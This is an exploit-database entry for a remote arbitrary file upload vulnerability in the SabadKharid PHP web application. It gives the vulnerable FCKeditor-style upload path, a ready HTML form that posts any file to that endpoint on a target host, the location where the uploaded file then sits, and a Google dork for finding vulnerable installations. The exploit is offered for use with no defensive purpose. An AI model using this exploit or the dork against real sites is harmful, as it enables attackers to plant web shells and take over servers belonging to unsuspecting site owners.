SabadKharid Remote Arbitrary File Upload Exploit

2011-09-27T00:00:00
ID 1337DAY-ID-17192
Type zdt
Reporter St493r
Modified 2011-09-27T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[#] Author  : St493r
[#] Contact : [email protected]
[#] Title   : SabadKharid Remote Arbitrary File Upload Exploit 
[#] Vendor  : http://sabadkharid.com
[#] Date    : 19 - 09 - 2011
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[#] Vulnerability File : /wysiwyg/editor/filemanager/upload/php/upload.php
[#] Exploit            : Exploit.html

<strong>SabadKharid Remote Arbitrary File Upload Exploit</strong>
<form enctype="multipart/form-data" action="
http://TARGET/wysiwyg/editor/filemanager/upload/php/upload.php?Type=Media"
method="post">
<input name="NewFile" type="file">
<input type="submit" value="submit">
</form>

You can upload any file with any suffic

After upload you can your file here : http://TARGET/userfiles/yourfile

Google dork : Powered by Sabadkharid , inurl:"index.php?register"
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[#] Thanks To All Iranian Hackers
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++



#  0day.today [2018-01-05]  #